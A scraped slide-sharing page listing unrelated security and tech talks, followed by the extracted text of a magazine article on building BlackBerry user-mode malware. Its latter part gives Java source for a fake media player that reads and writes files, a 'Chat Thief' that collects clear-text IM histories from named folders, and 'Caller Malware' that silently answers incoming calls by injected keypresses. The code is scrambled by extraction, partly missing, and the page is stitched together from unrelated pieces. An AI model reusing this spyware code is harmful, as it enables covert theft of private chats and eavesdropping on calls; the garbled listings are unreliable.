This document discusses how easily user-mode rootkits and malware can be developed for BlackBerry devices by exploiting application programming interfaces (APIs) and oversight in privilege handling. It provides examples of real malware like Android Plankton and Geinimi that steal information by abusing APIs rather than exploiting vulnerabilities. The document argues that similar techniques could be used to create malware disguised as media players or chat applications for BlackBerry, which could steal files, conversations, and device information by accessing the unencrypted filesystem and chat logs. Code snippets are provided to demonstrate how this could be done by reading and writing files and monitoring communication history folders.
When developers api simplify user mode rootkits development – part iiYury Chemerkin
This series of articles is about the ease of which user-mode rootkits for BlackBerry can be developed. In a previous article, several cases were mentioned along with ideas on how a mobile rootkit could easily be built on the application level by exploiting API and privilege escalation vulnerabilities or oversight. Cases covered the top trojans for two years with the first one being Android Plankton. Instead of giving access to hidden levels of this popular game, malware sends information about the device to criminals and downloads other malicious programs.
What are the Botnets? Description of what are botnets and how they works. what are the known botnet attacks.and architecture of botnets. slides also describes some prevention steps from botnet attack.
A novel way of integrating voice recognition and one time passwords to preven...ijdpsjournal
Phishing is a threat to all users of the internet who intend to use the web for secure transactions. In the
recent years the number of phishing attacks have increased drastically especially since the advent of ecommerce,
net banking and other services that have an emphasis on security. Phishing is characterized as
any malicious attack aided by a spoofed webpage to encourage users to input their security details.
Phishing is largely done to retrieve passwords and security details of unsuspecting users. This paper
details a new and more secure way to counteract the method of phishing
A presentation I am giving this evening, as a guest speaker, invited by the Wisconsin Union Directorate, on the topics of cybersecurity, hacking, and privacy. The presentation covers some timely topics, such as: Hacking, Botnets, Deep Web, Target Stores Data Breach, Bitcoin and Ransomware. The presentation is designed to educate, stimulate conversation and entertain and is open to all students, faculty and staff of UW-Madison, who are interested in learning more about computer security and IT threats.
When developers api simplify user mode rootkits development – part iiYury Chemerkin
This series of articles is about the ease of which user-mode rootkits for BlackBerry can be developed. In a previous article, several cases were mentioned along with ideas on how a mobile rootkit could easily be built on the application level by exploiting API and privilege escalation vulnerabilities or oversight. Cases covered the top trojans for two years with the first one being Android Plankton. Instead of giving access to hidden levels of this popular game, malware sends information about the device to criminals and downloads other malicious programs.
What are the Botnets? Description of what are botnets and how they works. what are the known botnet attacks.and architecture of botnets. slides also describes some prevention steps from botnet attack.
A novel way of integrating voice recognition and one time passwords to preven...ijdpsjournal
Phishing is a threat to all users of the internet who intend to use the web for secure transactions. In the
recent years the number of phishing attacks have increased drastically especially since the advent of ecommerce,
net banking and other services that have an emphasis on security. Phishing is characterized as
any malicious attack aided by a spoofed webpage to encourage users to input their security details.
Phishing is largely done to retrieve passwords and security details of unsuspecting users. This paper
details a new and more secure way to counteract the method of phishing
A presentation I am giving this evening, as a guest speaker, invited by the Wisconsin Union Directorate, on the topics of cybersecurity, hacking, and privacy. The presentation covers some timely topics, such as: Hacking, Botnets, Deep Web, Target Stores Data Breach, Bitcoin and Ransomware. The presentation is designed to educate, stimulate conversation and entertain and is open to all students, faculty and staff of UW-Madison, who are interested in learning more about computer security and IT threats.
Securing Internet communications end-to-end with the DANE protocolAfnic
Highlighting the fact that securing communications over the Internet is more important than ever before, Afnic launches an issue paper on the DANE protocol
Web phish detection (an evolutionary approach)eSAT Journals
Abstract Phishing is nothing but one of the kinds of network crimes. This paper presents an efficient approach for detecting phishing web documents based on learning from a large number of phishing webs. Phishing means to make something fraud with someone, usually by using internet with the help of emails, to take our personal information, such as credentials. The finest way to protect ourselves and our credentials from phishing attack is to understand the concept of phishing as well as to understand that how to determine a phishing attack. Most of the phishing emails are sent from well-reputed organizations and they ask for your credentials such as credit card number, account number, social security number and passwords of bank account. Mostly the phishing attacks seen from the websites, services and organizations with which we do not even have an account. In this system we are using two classifiers to detect phishing. To recognize the phishing, the Uniform Resource Locator (URL) features of the website are firstly analyzed and then they are classified by using K-means classifier. If the answer is still suspicious then by using parsing of the webpage, its DOM tree is drawn and then the second classifier that is Naive Bayesian (NB) classifier classifies the web page. Key Words: phishing, phishing emails, classifier
IJRET : International Journal of Research in Engineering and Technology is an international peer reviewed, online journal published by eSAT Publishing House for the enhancement of research in various disciplines of Engineering and Technology. The aim and scope of the journal is to provide an academic medium and an important reference for the advancement and dissemination of research results that support high-level learning, teaching and research in the fields of Engineering and Technology. We bring together Scientists, Academician, Field Engineers, Scholars and Students of related fields of Engineering and Technology
Securing Internet communications end-to-end with the DANE protocolAfnic
Highlighting the fact that securing communications over the Internet is more important than ever before, Afnic launches an issue paper on the DANE protocol
Web phish detection (an evolutionary approach)eSAT Journals
Abstract Phishing is nothing but one of the kinds of network crimes. This paper presents an efficient approach for detecting phishing web documents based on learning from a large number of phishing webs. Phishing means to make something fraud with someone, usually by using internet with the help of emails, to take our personal information, such as credentials. The finest way to protect ourselves and our credentials from phishing attack is to understand the concept of phishing as well as to understand that how to determine a phishing attack. Most of the phishing emails are sent from well-reputed organizations and they ask for your credentials such as credit card number, account number, social security number and passwords of bank account. Mostly the phishing attacks seen from the websites, services and organizations with which we do not even have an account. In this system we are using two classifiers to detect phishing. To recognize the phishing, the Uniform Resource Locator (URL) features of the website are firstly analyzed and then they are classified by using K-means classifier. If the answer is still suspicious then by using parsing of the webpage, its DOM tree is drawn and then the second classifier that is Naive Bayesian (NB) classifier classifies the web page. Key Words: phishing, phishing emails, classifier
IJRET : International Journal of Research in Engineering and Technology is an international peer reviewed, online journal published by eSAT Publishing House for the enhancement of research in various disciplines of Engineering and Technology. The aim and scope of the journal is to provide an academic medium and an important reference for the advancement and dissemination of research results that support high-level learning, teaching and research in the fields of Engineering and Technology. We bring together Scientists, Academician, Field Engineers, Scholars and Students of related fields of Engineering and Technology
After conducting a user survey for the client, my next job was to create a research report which summarized my findings and offered suggestions on how we could improve the client's website based on the needs of the users.
Security+ Guide to Network Security Fundamentals, 3rd Edition, by Mark Ciampa
Knowledge and skills required for Network Administrators and Information Technology professionals to be aware of security vulnerabilities, to implement security measures, to analyze an existing network environment in consideration of known security threats or risks, to defend against attacks or viruses, and to ensure data privacy and integrity. Terminology and procedures for implementation and configuration of security, including access control, authorization, encryption, packet filters, firewalls, and Virtual Private Networks (VPNs).
CNIT 120: Network Security
http://samsclass.info/120/120_S09.shtml#lecture
Policy: http://samsclass.info/policy_use.htm
Many thanks to Sam Bowne for allowing to publish these presentations.
Ramnit is a worm that spreads through removable drives by infecting files. The worm (W32.Ramnit) was first discovered in early 2010 and later that year, a second variant of Ramnit (W32.Ramnit.B) was identified. Since then, Ramnit’s operators have made considerable upgrades to the threat, including implementing the use of modules, which was borrowed from the leaked source code of the Zeus banking Trojan (Trojan.Zbot) in May 2011.
Currently, Ramnit’s operators are primarily focused on information-stealing tactics, targeting data such as passwords and online banking login credentials. They also install remote access tools on affected computers in order to maintain back door connectivity. It is estimated that the Ramnit botnet may consist of up to 350,000 compromised computers worldwide.
When developer's api simplify user mode rootkits developing.Yury Chemerkin
This is a series of articles about shell extensions that enhance high-level features of any operation system. However, such possibilities not only enrich platform but simplify developing trojans, exploits that leads to the new security holes. Mostly this kind of extensions are known as usermode rootkits.
http://hakin9.org/theultimat/
Neuro-symbolic is not enough, we need neuro-*semantic*Frank van Harmelen
Neuro-symbolic (NeSy) AI is on the rise. However, simply machine learning on just any symbolic structure is not sufficient to really harvest the gains of NeSy. These will only be gained when the symbolic structures have an actual semantics. I give an operational definition of semantics as “predictable inference”.
All of this illustrated with link prediction over knowledge graphs, but the argument is general.
UiPath Test Automation using UiPath Test Suite series, part 4DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 4. In this session, we will cover Test Manager overview along with SAP heatmap.
The UiPath Test Manager overview with SAP heatmap webinar offers a concise yet comprehensive exploration of the role of a Test Manager within SAP environments, coupled with the utilization of heatmaps for effective testing strategies.
Participants will gain insights into the responsibilities, challenges, and best practices associated with test management in SAP projects. Additionally, the webinar delves into the significance of heatmaps as a visual aid for identifying testing priorities, areas of risk, and resource allocation within SAP landscapes. Through this session, attendees can expect to enhance their understanding of test management principles while learning practical approaches to optimize testing processes in SAP environments using heatmap visualization techniques
What will you get from this session?
1. Insights into SAP testing best practices
2. Heatmap utilization for testing
3. Optimization of testing processes
4. Demo
Topics covered:
Execution from the test manager
Orchestrator execution result
Defect reporting
SAP heatmap example with demo
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf91mobiles
91mobiles recently conducted a Smart TV Buyer Insights Survey in which we asked over 3,000 respondents about the TV they own, aspects they look at on a new TV, and their TV buying preferences.
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
Accelerate your Kubernetes clusters with Varnish CachingThijs Feryn
A presentation about the usage and availability of Varnish on Kubernetes. This talk explores the capabilities of Varnish caching and shows how to use the Varnish Helm chart to deploy it to Kubernetes.
This presentation was delivered at K8SUG Singapore. See https://feryn.eu/presentations/accelerate-your-kubernetes-clusters-with-varnish-caching-k8sug-singapore-28-2024 for more details.
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Tobias Schneck
As AI technology is pushing into IT I was wondering myself, as an “infrastructure container kubernetes guy”, how get this fancy AI technology get managed from an infrastructure operational view? Is it possible to apply our lovely cloud native principals as well? What benefit’s both technologies could bring to each other?
Let me take this questions and provide you a short journey through existing deployment models and use cases for AI software. On practical examples, we discuss what cloud/on-premise strategy we may need for applying it to our own infrastructure to get it to work from an enterprise perspective. I want to give an overview about infrastructure requirements and technologies, what could be beneficial or limiting your AI use cases in an enterprise environment. An interactive Demo will give you some insides, what approaches I got already working for real.
Key Trends Shaping the Future of Infrastructure.pdfCheryl Hung
Keynote at DIGIT West Expo, Glasgow on 29 May 2024.
Cheryl Hung, ochery.com
Sr Director, Infrastructure Ecosystem, Arm.
The key trends across hardware, cloud and open-source; exploring how these areas are likely to mature and develop over the short and long-term, and then considering how organisations can position themselves to adapt and thrive.
JMeter webinar - integration with InfluxDB and GrafanaRTTS
Watch this recorded webinar about real-time monitoring of application performance. See how to integrate Apache JMeter, the open-source leader in performance testing, with InfluxDB, the open-source time-series database, and Grafana, the open-source analytics and visualization application.
In this webinar, we will review the benefits of leveraging InfluxDB and Grafana when executing load tests and demonstrate how these tools are used to visualize performance metrics.
Length: 30 minutes
Session Overview
-------------------------------------------
During this webinar, we will cover the following topics while demonstrating the integrations of JMeter, InfluxDB and Grafana:
- What out-of-the-box solutions are available for real-time monitoring JMeter tests?
- What are the benefits of integrating InfluxDB and Grafana into the load testing stack?
- Which features are provided by Grafana?
- Demonstration of InfluxDB and Grafana using a practice web application
To view the webinar recording, go to:
https://www.rttsweb.com/jmeter-integration-webinar
Let's dive deeper into the world of ODC! Ricardo Alves (OutSystems) will join us to tell all about the new Data Fabric. After that, Sezen de Bruijn (OutSystems) will get into the details on how to best design a sturdy architecture within ODC.
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...DanBrown980551
Do you want to learn how to model and simulate an electrical network from scratch in under an hour?
Then welcome to this PowSyBl workshop, hosted by Rte, the French Transmission System Operator (TSO)!
During the webinar, you will discover the PowSyBl ecosystem as well as handle and study an electrical network through an interactive Python notebook.
PowSyBl is an open source project hosted by LF Energy, which offers a comprehensive set of features for electrical grid modelling and simulation. Among other advanced features, PowSyBl provides:
- A fully editable and extendable library for grid component modelling;
- Visualization tools to display your network;
- Grid simulation tools, such as power flows, security analyses (with or without remedial actions) and sensitivity analyses;
The framework is mostly written in Java, with a Python binding so that Python developers can access PowSyBl functionalities as well.
What you will learn during the webinar:
- For beginners: discover PowSyBl's functionalities through a quick general presentation and the notebook, without needing any expert coding skills;
- For advanced developers: master the skills to efficiently apply PowSyBl functionalities to your real-world scenarios.
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...UiPathCommunity
💥 Speed, accuracy, and scaling – discover the superpowers of GenAI in action with UiPath Document Understanding and Communications Mining™:
See how to accelerate model training and optimize model performance with active learning
Learn about the latest enhancements to out-of-the-box document processing – with little to no training required
Get an exclusive demo of the new family of UiPath LLMs – GenAI models specialized for processing different types of documents and messages
This is a hands-on session specifically designed for automation developers and AI enthusiasts seeking to enhance their knowledge in leveraging the latest intelligent document processing capabilities offered by UiPath.
Speakers:
👨🏫 Andras Palfi, Senior Product Manager, UiPath
👩🏫 Lenka Dulovicova, Product Program Manager, UiPath
UiPath Test Automation using UiPath Test Suite series, part 3DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 3. In this session, we will cover desktop automation along with UI automation.
Topics covered:
UI automation Introduction,
UI automation Sample
Desktop automation flow
Pradeep Chinnala, Senior Consultant Automation Developer @WonderBotz and UiPath MVP
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualityInflectra
In this insightful webinar, Inflectra explores how artificial intelligence (AI) is transforming software development and testing. Discover how AI-powered tools are revolutionizing every stage of the software development lifecycle (SDLC), from design and prototyping to testing, deployment, and monitoring.
Learn about:
• The Future of Testing: How AI is shifting testing towards verification, analysis, and higher-level skills, while reducing repetitive tasks.
• Test Automation: How AI-powered test case generation, optimization, and self-healing tests are making testing more efficient and effective.
• Visual Testing: Explore the emerging capabilities of AI in visual testing and how it's set to revolutionize UI verification.
• Inflectra's AI Solutions: See demonstrations of Inflectra's cutting-edge AI tools like the ChatGPT plugin and Azure Open AI platform, designed to streamline your testing process.
Whether you're a developer, tester, or QA professional, this webinar will give you valuable insights into how AI is shaping the future of software delivery.
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
When developers api simplify user mode rootkits development – part ii
1.
2. Mobile Security
When developers API
simplify user-mode rootkits development
This series of articles is about the ease of which user-mode rootkits for
BlackBerry can be developed.
I
n a previous article, several cases were mentioned
along with ideas on how a mobile rootkit could easily
be built on the application level by exploiting API and
privilege escalation vulnerabilities or oversight. Cases
covered the top trojans for two years with the first one
being Android Plankton. Instead of giving access to hidden levels of this popular game, malware sends information about the device to criminals and downloads
other malicious programs.
From the Android Market alone, the infected program was downloaded more than 150,000 times and
from alternative resources the number of downloads
reached 250,000. Android.Plankton does not exploit
known vulnerabilities in operating systems to elevate
its own privileges. Instead, it downloads its own service in the background immediately after the launch
of the infected application and begins to collect information about the device and sends it to a remote
server.
Another example was the Android malware DroidKungFu. This malware is capable of rooting the vulnerable Android phones and may successfully evade detection by the current mobile anti-virus software. This
malware is identified from four Android apps that have
been circulated among at least eight alternative Chinese app markets and forums. The malware will add a
new service and receiver into the infected app. The receiver will be notified when the system finishes booting
so that it can automatically launch the service without
user interaction.
Geinimi Trojan includes capacities to gain for:
• Reading and collecting SMS messages
• Sending and deleting selected SMS messages
56
• Pulling all contact information and sending it to a
remote server (number, name, the time they were
last contacted)
• Placing a phone call
• Silently downloading files
• Launching a web browser with a specific URL
Geinimi has three different methods of starting itself. The trojan will first launch itself as its own service. The service allows the trojan to start while the
host application appears to functioning normally. Two
other ways Geinimi starts revolves around BroadcastReceivers Android events occurring. The trojan
will wake itself up from an SMS message. The Geinimi trojan has encrypted the embedded data, payload and all communications – however, encryption
is weak. The values in the request for commands
can be used by the command and control server to
identify information about infected devices. The longitude and latitude can then be used to track the location of this specific user. Also, the trojan gathers a
list of applications and their activities on the device,
sends an SMS to any recipient, deletes SMSs, lists
SMSs to specific contacts, lists contacts and their
information, calls any number, silently downloads
files and launches a web browser with a specific
URL.
An SMS trojan called Trojan-SMS.AndroidOS.FakePlayer, once installed, actually sends out SMS messages without the user’s knowledge or consent. Users are prompted to install a small file of around 13KB
(have you ever seen such a small media player?). The
trojan bundled with it then begins texting premium rate
phone numbers. The criminals are actually the ones
04/2012
3. Listing 1. API-routines to design malware “MEDIA PLAYER IO (Input/Output)”
import java.io.DataInputStream;
import java.io.IOException;
import java.io.OutputStream;
import javax.microedition.io.Connector;
import javax.microedition.io.file.FileConnection;
import net.rim.device.api.io.IOUtilities;
Listing 2a. Code Example how read and write files [malware “MEDIA PLAYER IO (Input/Output)”]
public static byte[] readFile(String FullName)
///FullName includes FullPath to file with file name and file extension
{
//array of data you want to return (read)
byte[] data = null;
FileConnection fconn = null;
DataInputStream is = null;
try
{
fconn = (FileConnection) Connector.open(FullName, Connector.READ);
s = fconn.openDataInputStream();
}
data = IOUtilities.streamToBytes(is);
catch (IOException e)
{ }
finally
{
try
{
f (null != is)
{
}
s.close();
if (null != fconn)
{
}
}
}
}
catch (IOException e)
fconn.close();
{ }
return data;
public static void writeFile(String FullName, byte[] data)
///FullName includes FullPath to file with file name and file extension
// data is array you want to put into file
{
FileConnection fconn = null;
OutputStream os = null;
try
{
fconn = (FileConnection) Connector.open(FullName, Connector.READ_WRITE);
if (!fconn.exists())
{
www.hakin9.org/en
// create file if one doesn’t exist
57
4. Mobile Security
Listing 2a. Code Example how read and write files [malware “MEDIA PLAYER IO (Input/Output)”]
fconn.create();
}
os = fconn.openOutputStream(fconn.fileSize());
}
os.write(data);
catch (Exception e)
finally
{
{ Dialog.alert(e.getMessage());
try
{
}
}
}
os.close();
fconn.close();
catch (IOException e)
{ Dialog.alert(e.getMessage()); }
Listing 3. File’n’Folder TreeWalk (breifly)
Vector Path = new Vector();
Path.addElement((String) “file:///SDCard/BlackBerry/im”);
Path.addElement((String) “...” - repeat several times
Enumeration Path_enum = Path.elements();
while (Path_enum.hasMoreElements())
{
}
current_path = (String) Path_enum.nextElement();
to do something
operating these numbers, so they end up collecting the
money via charges to the victims’ accounts.
The trojan spyware application known as Zitmo, is designed to steal people’s financial data by listening to all incoming SMS messages and forwarding them to a remote
web server. That is a security risk, as some banks now
send mTANs via SMS as a one-time password for authentication. By intercepting these passwords, it can not only
create fraudulent money transfers, but also verify them.
The trojan program “OddJob” does not require fraudsters to log into a user’s online bank account to steal
from it. Instead, the malware is designed to hijack a
user’s online banking session in real-time by stealing
session ID tokens. By stealing the tokens and embedding them into their own browsers, fraudsters can impersonate a legitimate user and access accounts while
the user is still active online. The access allows fraudsters to then conduct whatever banking operations the
account holder can perform. This approach is different than typical man-in-the browser attacks where attackers use trojans to steal login credentials that are
then used to break into online accounts. The second
interesting feature in OddJob is its ability to keep an
58
online banking session open and live even after users think they have logged out of their account. This
allows criminals to extract money and continue other
fraudulent activity even after the user thinks the session has ended.
BlackBerry Opportunity
Is it really difficult to bring the vulnerabilities to the BlackBerry devices? We are going to see how it is really easy
to port these techniques to BlackBerry devices.
The first two ideas and proof-of-concepts are about
the BlackBerry file-system. As you may know, BlackBerry can encipher the whole file system as well as removed files. Talking about a ciphered file-system, you
should understand that this feature makes sense only
when all storage cards and memory are removed from
devices to extract information, similar to forensic cases.
Instead, when you rely on live spying you will get much
more information rather trying to decipher it or get the
password.
First malware concept, the so called media player,
based not so much on human bugs as it is on GUI
bugs. Unfortunately, humans are not the last point of
04/2012
5. File Paths should be monitored
/Device/Home/User/ – if information stored on internal memory
/MediaCard/BlackBerry/ – if information stored on external memory
../IM/AIM/USERNAME/history/ – AIMs history in csv format
../IM/BlackBerryMessenger/PIN/history/ – BBMs history in csv format
../IM/GoogleTalk/USERNAME/history/ – GTalks history in csv format
../IM/Yahoo/USERNAME/history/ – YMessengers history in csv format
../IM/WindowsLive/USERNAME/history/ – WLives history in csv format
../pictures – Manully added pic or screenshoted data
../camera – Photo captured data
../videos – Video captured data
../voice notes – Voice captured data
defense when we talk about vulnerabilities, trojans,
etc. Our behaviour is based on traditions of the past
sometimes, as well as tools which used to change with
age. In the past, access to files used to be strictly via
DOS/Unix system; nowadays we have an aggregation
of folders like Music, Photos, Photo-Camera’s folder,
or Videos. The GUI was developed as a result of the
desire for a convenient way to access files. Taking the
discussion to file access on our smart phones, audio
notes, photos, videos, music, and camera’s data are
stored in one place (more correctly in two places, on
internal storage and external storage like SD-card)
and applications are allowed to access these folder
paths to extract data in real-time; moreover API access to those same folders are easily obtained. Also,
they may associate their listeners with a specific file
format like .AMR which used to store your BlackBerry
audio notes. They are often stored in the “voicenotes”
folder, named as VN-20120319-xxxx.AMR. As you can
see, you do not need to extract its properties to know
when it was recorded; you do not even need to link
(programmatically) the folder with type of file (logical
level) because “VN” is a voice note. Video files are recorded by the device and named “VID-YYYYMMDDXXXXXX.3GP” as voice note or picture file. Photos are
named as IMG20120103-xxxx. To talk about a geo-tag
per file, a “Moskva” prefix in added to file name. It is
obvious why developers store the name of the file as
the city part, date part and increment part. Continuous
numbering is allowed in these cases, but why isn’t it
developed with the increment part then the hash part
at the end of file name (XXXX-hash-dot-extension)?
Several file-systems differ in the way files should be
sorted, but developers are still able to ask device owners what they prefer. Doing this makes things simple, easier to control and a bit more secure, don’t you
agree? Of course, our media player as malware must
have a network connection to get updates despite the
fact that each BlackBerry device receives update notifications from AppWorld and OS updates should be received via USB-cable by synchronizing with the BlackBerry Desktop Software. Instead, our application may
grab news from an official site, update news, offers to
share music status and steal and send cached information (Listing 1-Listing 3).
Second malware concept covers BlackBerry chats. If
you turn on the option to save chat on internal storage
(device) or on external storage (SD-Card) you will be
notified about how you should ask interlocutor to agree
with recording your chat history. By the way, it doesn’t
Figure 1. Logged BlackBerry Conversation
Figure 2. Window of BlackBerry Conversation
www.hakin9.org/en
59
6. Mobile Security
Figure 3. Logged Google Conversation
Figure 5. Logged WinLive Conversation
Figure 4. Window of Google Conversation
Figure 6. Window of WinLive Conversation
Chat Details
Then stores a “history” folder which contatins .CSV files named
by account name of interlocutor like yury.chemerkin@gmail.
com. Also, conference/group chats folder are placed here:
INTERNAL STORAGE: file:///store/home/user/im
EXTERNAL STORAGE: file:///SDCard/BlackBerry/im
•
•
•
•
•
All IM chats (from application developed by RIM) files marked
to be saved are often located on the same file paths
Then stores IM folder per each native IM client
IM Folders
•
•
•
•
•
AIM
BlackBerry Messenger
Google Talk
Windows Live
Yahoo
Then stores folder named as your account such as
•
•
•
•
•
60
AIM Account: yury.chemerkin@aim.com
Google Account: yury.chemerkin@gmail.com
Windows Live Account: yury.chemerkin@hotmail.com
Yahoo Account: yury.chemerkin
BlackBerry Account: 23436780 (BlackBerry PIN)
AIM: Conferences
Google: Conferences
Windows Live: Conferences
Yahoo: Conferences
BlackBerry: Group Chats
BlackBerry chat csv file format
Date/Time
PIN Sender
YYYYMMDDHHMMSSMS HEX VALUE
PIN Receiver Data
HEX VALUE
STRING
Non-BlackBerry chat csv file format
Date/Time
ID Sender
ID Receiver
Data
YYYYMMDDHHMMSSMS
STRING
STRING
STRING
04/2012
7. Figure 7. Logged Yahoo Conversation
Figure 9. Logged AIM (AOL) Conversation
work for each, instead, it is a global feature; that’s why
there’s no sense as you see. By default this feature is
turned off. However, if you turn on saving you will be surprised by the fact that your data is stored in clear-text.
Don’t think that only Google, Yahoo, or another nonBlackBerry doesn’t encipher them; BlackBerry chats are
still not encrypted. Also, Shape IM+ for Linux relies on
the root folder only without encryption. Note, that Yahoo
Messenger, AIM (AOL) Messenger, Windows Live Messenger, Google Messenger and BlackBerry Messenger
are developed by RIM. However, there’s a native security solution: no .CSV format by the device except for
special programs. Just copy this file to a PC and open it
with Notepad. To see formatted chats, you should open
it with Excel or OpenOffice.
• The same way to store chats
• You need to turn on saving option feature
• Notepad or Excel to see them (Figure 1-Figure 10,
Listing 4)
• File-system ciphering isn’t developed for live spying
• Chats stored in clear-text
• You can’t read them with device
Third malware concept is based on several APIs acting in stealth mode. At first, you have to catch incoming call events, secondly, you have to simulate an answer event by simulating pressing of the answer button and then you should hide the caller screen to get
back the home screen by simulating/pressing the escape button. Answer simulating refers to the Keypad.
KEY _ SEND; to release pressing you have to press and
release button by simulating KeyCodeEvent.KEY _ DOWN
and KeyCodeEvent.KEY _ UP. Before you do this, you
should understand that at least 1 second should pass
when you get an incoming event to draw a native caller to the screen you managed. Then (when accepting an incoming call) you should hide via Keypad.
KEY _ ESCAPE , however if you press the escape button
you will be asked whether or not to go to the home
Figure 8. Window of Conversation
Figure 10. Window of AIM (AOL) Conversation
Summary
www.hakin9.org/en
61
8. Mobile Security
Listing 4a. IM Chat Thief
package blackberryChatThief;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.util.Enumeration;
import java.util.Vector;
import javax.microedition.io.Connector;
import javax.microedition.io.file.FileConnection;
import net.rim.device.api.io.IOUtilities;
import net.rim.device.api.io.file.ExtendedFileConnection;
import net.rim.device.api.ui.Field;
import net.rim.device.api.ui.FieldChangeListener;
import net.rim.device.api.ui.component.ButtonField;
import net.rim.device.api.ui.component.Dialog;
import net.rim.device.api.ui.container.MainScreen;
public class BlackBerryChatThiefScreen extends MainScreen implements FieldChangeListener
public BlackBerryChatThiefScreen()
{
setTitle(“BlackBerry Chat Thief Application”);
checkButton = new ButtonField(ButtonField.CONSUME_CLICK | ButtonField.FIELD_HCENTER);
checkButton.setLabel(“Steal your own chat :)”);
checkButton.setChangeListener(this);
add(checkButton);
exitButton = new ButtonField(ButtonField.CONSUME_CLICK | ButtonField.FIELD_HCENTER);
exitButton.setLabel(“Exit”);
exitButton.setChangeListener(this);
}
add(exitButton);
public void fieldChanged(Field field, int param)
{
if (field == checkButton)
{
String string_result;
try
{
Vector Path = new Vector();
String current_path = new String();
String current_im = new String();
String current_id = new String();
String current_conv = new String();
String root_dir = new String();
62
04/2012
13. Listing 4f. IM Chat Thief
}
catch (Exception ex)
{
}
}
string_result = ex.toString() + “||” + ex.getMessage();
Dialog.alert(string_result);
else if (field == exitButton)
{
}
}
System.exit(0);
}
Figure 11. Before Call
Figure 13. Answering
screen. Therefore malware has to simulate an agreement via Keypad.KEY _ ENTER to successfully bypass the
user eyes. Where it is all at, no one has another API
to make your own caller screen and manage the in-
coming calls. To extend impacting to simulate physical input, you can read my 2nd article (Hakin9, Is
Data Secure On The Password Protected Blackberry Device). However, it is easy to put a symbol in the
Figure 12. Incoming Call
Figure 14. Escaping to the Home Screen
www.hakin9.org/en
67
14. Mobile Security
Listing 5a. Caller Malware
package blackBerryPhoneEmulation;
import net.rim.blackberry.api.phone.Phone;
import net.rim.blackberry.api.phone.PhoneCall;
import net.rim.blackberry.api.phone.PhoneListener;
import net.rim.device.api.system.EventInjector;
import net.rim.device.api.system.EventInjector.KeyCodeEvent;
import net.rim.device.api.ui.UiApplication;
public class BlackBerryPhoneEmulationApp extends UiApplication implements PhoneListener
{
int sleep_time = 1000;
public static void main(String[] args)
{
}
BlackBerryPhoneEmulationApp theApp = new BlackBerryPhoneEmulationApp();
theApp.enterEventDispatcher();
public BlackBerryPhoneEmulationApp()
{
}
pushScreen(new BlackBerryPhoneEmulationScreen());
Phone.addPhoneListener(this);
public void close()
{
}
Phone.removePhoneListener(this);
System.exit(0);
public void callIncoming(int callId)
{
final PhoneCall call = Phone.getCall(callId);
final String number = call.getDisplayPhoneNumber();
EventInjector.KeyCodeEvent pressKey = new EventInjector.KeyCodeEvent(KeyCodeEvent.KEY_
DOWN, (char) Keypad.KEY_SEND, 0);
EventInjector.KeyCodeEvent releaseKey = new EventInjector.KeyCodeEvent(KeyCodeEvent.
KEY_UP, (char) Keypad.KEY_SEND, 0);
try
{
}
Thread.sleep(sleep_time);
catch (InterruptedException e) {}
EventInjector.invokeEvent(pressKey);
EventInjector.invokeEvent(releaseKey);
}
68
04/2012
15. Listing 5b. Caller Malware
public void callAdded(int callId) {}
public void callAnswered(int callId) {}
public void callConferenceCallEstablished(int callId) {}
public void callConnected(int callId)
{
EventInjector.KeyCodeEvent pressKey = new EventInjector.KeyCodeEvent(KeyCodeEvent.KEY_DOWN, (char)
Keypad.KEY_ESCAPE, 0);
EventInjector.KeyCodeEvent releaseKey = new EventInjector.KeyCodeEvent(KeyCodeEvent.KEY_UP, (char)
Keypad.KEY_ESCAPE, 0);
try
{
}
Thread.sleep(sleep_time);
// Waiting a caller screen have been drawn
catch (InterruptedException e) {}
}
EventInjector.invokeEvent(pressKey);
EventInjector.invokeEvent(releaseKey);
///Releasing Escaping to the Home Screen
pressKey = new EventInjector.KeyCodeEvent(KeyCodeEvent.KEY_DOWN, (char) Keypad.KEY_ENTER, 0);
eleaseKey = new EventInjector.KeyCodeEvent(KeyCodeEvent.KEY_UP, (char) Keypad.KEY_ENTER, 0);
try
{
}
Thread.sleep(sleep_time);
//Waiting prompt screen have been drawn
catch (InterruptedException e) {}
EventInjector.invokeEvent(pressKey);
EventInjector.invokeEvent(releaseKey);
}
///Accepting Escaping to the Home Screen
public void callDirectConnectConnected(int callId) {}
public void callDirectConnectDisconnected(int callId) {}
public void callDisconnected(int callId) {}
public void callEndedByUser(int callId) {}
public void callFailed(int callId, int reason) {}
public void callHeld(int callId) {}
public void callInitiated(int callid) {}
public void callRemoved(int callId) {}
public void callResumed(int callId) {}
public void callWaiting(int callid) {}
}
